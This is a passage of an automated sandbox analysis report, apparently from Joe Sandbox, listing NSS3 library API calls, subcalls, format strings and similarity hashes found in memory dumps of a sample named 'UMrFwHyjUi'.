                                                                                                                                                                                                                            • PR_Lock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4DBA
                                                                                                                                                                                                                            • PR_WaitCondVar.NSS3 ref: 6CAE4DD4
                                                                                                                                                                                                                            • PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4DE6
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4DEF
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Unlock$CondCriticalCurrentEnterSectionThreadValue$LockNotifyWait
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3388019835-0
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CC77CE0
                                                                                                                                                                                                                              • Part of subcall function 6CC29BF0: TlsGetValue.KERNEL32(?,?,?,6CC70A75), ref: 6CC29C07
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC77D36
                                                                                                                                                                                                                            • PR_Realloc.NSS3(?,00000080), ref: 6CC77D6D
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CC77D8B
                                                                                                                                                                                                                            • PR_snprintf.NSS3(?,?,NSPR_INHERIT_FDS=%s:%d:0x%lx,?,?,?), ref: 6CC77DC2
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6CC77DD8
                                                                                                                                                                                                                            • malloc.MOZGLUE(00000080), ref: 6CC77DF8
                                                                                                                                                                                                                            • PR_GetCurrentThread.NSS3 ref: 6CC77E06
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CurrentThread$strlen$R_snprintfReallocValuemalloc
                                                                                                                                                                                                                            • String ID: :%s:%d:0x%lx$NSPR_INHERIT_FDS=%s:%d:0x%lx
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,00000000,?,?,6CBADE64), ref: 6CBAED0C
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CBAED22
                                                                                                                                                                                                                              • Part of subcall function 6CBBB030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CC918D0,?), ref: 6CBBB095
                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6CBAED4A
                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6CBAED6B
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBAED38
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: TlsGetValue.KERNEL32(?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4C97
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: EnterCriticalSection.KERNEL32(?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CB0
                                                                                                                                                                                                                              • Part of subcall function 6CAE4C70: PR_Unlock.NSS3(?,?,?,?,?,6CAE3921,6CCC14E4,6CC2CC70), ref: 6CAE4CC9
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CBAED52
                                                                                                                                                                                                                            • PR_CallOnce.NSS3(6CCC2AA4,6CBC12D0), ref: 6CBAED83
                                                                                                                                                                                                                            • PL_FreeArenaPool.NSS3(?), ref: 6CBAED95
                                                                                                                                                                                                                            • PL_FinishArenaPool.NSS3(?), ref: 6CBAED9D
                                                                                                                                                                                                                              • Part of subcall function 6CBC64F0: free.MOZGLUE(00000000,00000000,00000000,00000000,?,6CBC127C,00000000,00000000,00000000), ref: 6CBC650E
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: ArenaPool$CallFinishFreeOnceUtil$CriticalDecodeEnterErrorFindInitItem_QuickSectionUnlockValuefree
                                                                                                                                                                                                                            • String ID: security
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_InitToken), ref: 6CB92CEC
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( slotID = 0x%x,?), ref: 6CB92D07
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_Now.NSS3 ref: 6CC70A22
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_ExplodeTime.NSS3(00000000,?,?,?), ref: 6CC70A35
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%04d-%02d-%02d %02d:%02d:%02d.%06d UTC - ,?,?,?,?,?,?,?), ref: 6CC70A66
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_GetCurrentThread.NSS3 ref: 6CC70A70
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_snprintf.NSS3(?,000001FF,%ld[%p]: ,00000000,00000000), ref: 6CC70A9D
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_vsnprintf.NSS3(-FFFFFDF0,000001FF,?,?), ref: 6CC70AC8
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_vsmprintf.NSS3(?,?), ref: 6CC70AE8
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70B19
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70B48
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70C76
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: PR_LogFlush.NSS3 ref: 6CC70C7E
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CB92D22
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70B88
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: memcpy.VCRUNTIME140(?,?,00000000), ref: 6CC70C5D
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,?,?), ref: 6CC70C8D
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70C9C
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70CD1
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC70CEC
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70CFB
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(00000000), ref: 6CC70D16
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,00000001,00000000,?), ref: 6CC70D26
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70D35
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(0000000A), ref: 6CC70D65
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,?), ref: 6CC70D70
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: _PR_MD_UNLOCK.NSS3(?), ref: 6CC70D90
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: free.MOZGLUE(00000000), ref: 6CC70D99
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CB92D3B
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fwrite.API-MS-WIN-CRT-STDIO-L1-1-0(?,00000001,00000000,?), ref: 6CC70BAB
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70BBA
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: fflush.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 6CC70D7E
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pLabel = 0x%p,?), ref: 6CB92D54
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CC70BCB
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: EnterCriticalSection.KERNEL32(?), ref: 6CC70BDE
                                                                                                                                                                                                                              • Part of subcall function 6CC709D0: OutputDebugStringA.KERNEL32(?), ref: 6CC70C16
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: DebugOutputString$Printfflush$fwrite$CriticalEnterR_snprintfSection$CurrentExplodeFlushR_vsmprintfR_vsnprintfThreadTimefputcfreememcpystrlen
                                                                                                                                                                                                                            • String ID: pLabel = 0x%p$ pPin = 0x%p$ slotID = 0x%x$ ulPinLen = %d$C_InitToken
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PORT_NewArena_Util.NSS3(00000400), ref: 6CBD4DCB
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6CB687ED,00000800,6CB5EF74,00000000), ref: 6CBC1000
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PR_NewLock.NSS3(?,00000800,6CB5EF74,00000000), ref: 6CBC1016
                                                                                                                                                                                                                              • Part of subcall function 6CBC0FF0: PL_InitArenaPool.NSS3(00000000,security,6CB687ED,00000008,?,00000800,6CB5EF74,00000000), ref: 6CBC102B
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,0000001C), ref: 6CBD4DE1
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PL_ArenaAllocate.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1141
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: PR_Unlock.NSS3(?,?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC1182
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC119C
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,0000001C), ref: 6CBD4DFF
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBD4E59
                                                                                                                                                                                                                              • Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7
                                                                                                                                                                                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,00000000,6CC9300C,00000000), ref: 6CBD4EB8
                                                                                                                                                                                                                            • SECOID_FindOID_Util.NSS3(?), ref: 6CBD4EFF
                                                                                                                                                                                                                            • memcmp.VCRUNTIME140(?,00000000,00000000), ref: 6CBD4F56
                                                                                                                                                                                                                            • PORT_FreeArena_Util.NSS3(?,00000000), ref: 6CBD521A
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$Arena$Alloc_Arena_Item_Value$AllocateCriticalDecodeEnterFindFreeInitLockPoolQuickSectionUnlockZfreecallocfreememcmp
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1025791883-0
                                                                                                                                                                                                                            • Opcode ID: 310176b160404682658e341348e87bed0481b36a5c5ef4f6de62bb524ed4a84c
                                                                                                                                                                                                                            • Instruction ID: f497741635c64d7a72f698e010ad7c41840c66c7fc1783a905174f00b3064fcb
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 310176b160404682658e341348e87bed0481b36a5c5ef4f6de62bb524ed4a84c
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2F1ACB1E00249CBDB08CF54D8407AEB7B2FF44358F268169E915AB780E735E985CF92
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECOID_GetAlgorithmTag_Util.NSS3(6CBD2C2A), ref: 6CBD0C81
                                                                                                                                                                                                                              • Part of subcall function 6CBBBE30: SECOID_FindOID_Util.NSS3(6CB7311B,00000000,?,6CB7311B,?), ref: 6CBBBE44
                                                                                                                                                                                                                              • Part of subcall function 6CBA8500: SECOID_GetAlgorithmTag_Util.NSS3(6CBA95DC,00000000,00000000,00000000,?,6CBA95DC,00000000,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA8517
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBD0CC4
                                                                                                                                                                                                                              • Part of subcall function 6CBBFAB0: free.MOZGLUE(?,-00000001,?,?,6CB5F673,00000000,00000000), ref: 6CBBFAC7
                                                                                                                                                                                                                            • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBD0CD5
                                                                                                                                                                                                                            • PORT_ZAlloc_Util.NSS3(0000101C), ref: 6CBD0D1D
                                                                                                                                                                                                                            • PK11_GetBlockSize.NSS3(-00000001,00000000), ref: 6CBD0D3B
                                                                                                                                                                                                                            • PK11_CreateContextBySymKey.NSS3(-00000001,00000104,?,00000000), ref: 6CBD0D7D
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBD0DB5
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBD0DC1
                                                                                                                                                                                                                            • free.MOZGLUE(00000000), ref: 6CBD0DF7
                                                                                                                                                                                                                            • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6CBD0E05
                                                                                                                                                                                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CBD0E0F
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECOID_FindOIDByTag_Util.NSS3(00000000,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA95E0
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: PK11_GetIVLength.NSS3(?,?,?,00000000,?,6CB87F4A,00000000,?,00000000,00000000), ref: 6CBA95F5
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECOID_GetAlgorithmTag_Util.NSS3(00000000), ref: 6CBA9609
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6CBA961D
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: PK11_GetInternalSlot.NSS3 ref: 6CBA970B
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: PK11_FreeSymKey.NSS3(00000000), ref: 6CBA9756
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: PK11_GetIVLength.NSS3(?), ref: 6CBA9767
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECITEM_DupItem_Util.NSS3(00000000), ref: 6CBA977E
                                                                                                                                                                                                                              • Part of subcall function 6CBA95C0: SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6CBA978E
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Util$K11_$Tag_$Item_$FindZfree$Algorithmfree$ContextLength$Alloc_BlockCreateDestroyFreeInternalSizeSlot
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3136566230-0
                                                                                                                                                                                                                            • Opcode ID: 79511a9c774a8e4d6602d988a106f4b07569cba8ef06524c672d06ea18b4326b
                                                                                                                                                                                                                            • Instruction ID: 7c22cefc2936448635e8412e24bd6129497f5757b7dc0685ae05b73d6adfb4e8
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79511a9c774a8e4d6602d988a106f4b07569cba8ef06524c672d06ea18b4326b
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 134101B5900295ABEB009F64EC81BAF7674EF45308F010029ED1967742EB31BA18CBE2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PK11_IsInternalKeySlot.NSS3(?,?,00000000,?), ref: 6CB7FCBD
                                                                                                                                                                                                                            • strchr.VCRUNTIME140(?,0000003A,?,?,00000000,?), ref: 6CB7FCCC
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,00000000,?), ref: 6CB7FCEF
                                                                                                                                                                                                                            • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6CB7FD32
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(00000000,00000001), ref: 6CB7FD46
                                                                                                                                                                                                                            • PORT_Alloc_Util.NSS3(00000001), ref: 6CB7FD51
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,00000000,-00000001), ref: 6CB7FD6D
                                                                                                                                                                                                                            • memcpy.VCRUNTIME140(00000000,?,?), ref: 6CB7FD84
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Alloc_Utilmemcpystrlen$ArenaInternalK11_Slotstrchr
                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                            • API String ID: 183580322-336475711
                                                                                                                                                                                                                            • Opcode ID: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                            • Instruction ID: 9f53078ce91f2ba9b4ea3797e48dbbd327ce78eaac57ac1baf4051a2b571942b
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6b01cbbeec5e53cf722db012dedf94c099d5da7b2fd0114ccdec8c6525f24190
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F31C0B29002A59BEB208AA4DD057AF77A8EF54318F150129DC24A7B00E775EA18C7F6
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_DigestInit), ref: 6CB96C66
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB96C94
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB96CA3
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB96CB9
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6CB96CD5
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: hSession = 0x%x$ pMechanism = 0x%p$ (CK_INVALID_HANDLE)$C_DigestInit
                                                                                                                                                                                                                            • API String ID: 1003633598-3690128261
                                                                                                                                                                                                                            • Opcode ID: fbc39f6fdc937d8471ed722e224550ff7d0331b215b5ee757b22e4c1386d5dba
                                                                                                                                                                                                                            • Instruction ID: 162ca5504ab7d9d8e2f9841e825fb9a52333393fee75183b0294888c3fbb4c27
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fbc39f6fdc937d8471ed722e224550ff7d0331b215b5ee757b22e4c1386d5dba
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8F210170601194ABDB509B259D99F9F3BB5EB4331DF494039E809D7B12EB309A48CBE2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(C_SessionCancel), ref: 6CB99DF6
                                                                                                                                                                                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CB99E24
                                                                                                                                                                                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CB99E33
                                                                                                                                                                                                                              • Part of subcall function 6CC7D930: PL_strncpyz.NSS3(?,?,?), ref: 6CC7D963
                                                                                                                                                                                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CB99E49
                                                                                                                                                                                                                            • PR_LogPrint.NSS3( flags = 0x%x,?), ref: 6CB99E65
                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000002.00000002.2720558562.000000006CAE1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CAE0000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720534101.000000006CAE0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720711894.000000006CC7F000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720756767.000000006CCBE000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720774330.000000006CCBF000.00000008.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720791907.000000006CCC0000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            • Associated: 00000002.00000002.2720812780.000000006CCC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_6cae0000_UMrFwHyjUi.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                                                                                                                                                                                            • String ID: flags = 0x%x$ hSession = 0x%x$ (CK_INVALID_HANDLE)$C_SessionCancel
                                                                                                                                                                                                                            • API String ID: 1003633598-1678415578
                                                                                                                                                                                                                            • Opcode ID: 777472104fc251a741f5a581ccf3e27b9b633f6f76e7fb8763f111f0ecd2b023
                                                                                                                                                                                                                            • Instruction ID: 9e340ed45d224e1df9591efef6448c62119b8191b6a82cbba5782869e1e61ffe
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 777472104fc251a741f5a581ccf3e27b9b633f6f76e7fb8763f111f0ecd2b023
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B821F3B1A02184AFDB509B14DC98BAE37B4EB4370DF454035E80DA7B11EB309E4DC7A2
                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SECITEM_ArenaDupItem_Util.NSS3(?,6CB67D8F,6CB67D8F,?,?), ref: 6CB66DC8
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: PORT_ArenaAlloc_Util.NSS3(?,0000000C,00000000,?,?), ref: 6CBBFE08
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?), ref: 6CBBFE1D
                                                                                                                                                                                                                              • Part of subcall function 6CBBFDF0: memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?), ref: 6CBBFE62
                                                                                                                                                                                                                            • PORT_ArenaAlloc_Util.NSS3(?,00000010,?,?,6CB67D8F,?,?), ref: 6CB66DD5
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: TlsGetValue.KERNEL32(?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC10F3
                                                                                                                                                                                                                              • Part of subcall function 6CBC10C0: EnterCriticalSection.KERNEL32(?,?,6CB68802,00000000,00000008,?,6CB5EF74,00000000), ref: 6CBC110C
